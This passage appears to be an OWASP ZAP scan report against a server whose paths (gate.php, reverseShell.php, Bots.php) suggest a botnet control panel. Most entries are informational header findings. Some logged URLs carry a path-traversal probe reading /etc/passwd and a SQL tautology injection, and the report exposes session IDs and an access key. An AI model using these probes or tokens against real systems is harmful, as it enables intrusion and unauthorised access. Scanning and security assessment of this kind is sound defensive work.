Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 38
Solution
Ensure that Sec-Fetch-Mode header is included in request headers.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-Fetch-Mode
Tags WSTG-v42-SESS-05
CWE Id 352
WASC Id 9
Plugin Id 90005
Informational
Sec-Fetch-Site Header is Missing
Description
Specifies the relationship between request initiator's origin and target's origin.
URL http://142.202.242.172
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Site
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 38
Solution
Ensure that Sec-Fetch-Site header is included in request headers.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-Fetch-Site
Tags WSTG-v42-SESS-05
CWE Id 352
WASC Id 9
Plugin Id 90005
Informational
Sec-Fetch-User Header is Missing
Description
Specifies if a navigation request was initiated by a user.
URL http://142.202.242.172
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 698 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 747 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 721 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 770 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 705 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 15,024 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-User
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 44
Solution
Ensure that Sec-Fetch-User header is included in user initiated requests.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-Fetch-User
Tags WSTG-v42-SESS-05
CWE Id 352
WASC Id 9
Plugin Id 90005
Informational
Session Management Response Identified
Description
The given response has been identified as containing a session management token. The 'Other Info' field contains a set of header tokens that can be used in the Header Based Session Management Method. If the request is in a context which has a Session Management Method set to "Auto-Detect" then this rule will change the session management to use the tokens identified.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence d4jh6b56s7qrf75eg0mrmjoo8f
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence ohcrer01tp4qgr8qv9sbq0443d
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter PHPSESSID
Attack
Evidence 099m8nt9c49pui810ihliqu6i3
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter PHPSESSID
Attack
Evidence na7rti1i9k5223j81gbggbmjb9
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence cm7o4rgkcr1ohkcen7a814qgg5
Request Header - size: 193 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence dkpnmg9utaojnfe1ldtfiib0c3
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter PHPSESSID
Attack
Evidence gdqjteopg1n2q0m9f4dlhroc54
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence 35kj2pup1e5dd1pbmuuc5b7iuo
Request Header - size: 207 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence ntoh03s1e4o42g0eqeaf611luj
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter PHPSESSID
Attack
Evidence j1m378vmaoo5kcecq6g2711m8v
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter PHPSESSID
Attack
Evidence jg6sb3eaflgc4juth0h6gs7nke
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 1,015 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 61chtgv8v44nsmqjm243hs5isb
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 8fl4375vlgl6o8opivodnvl321
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
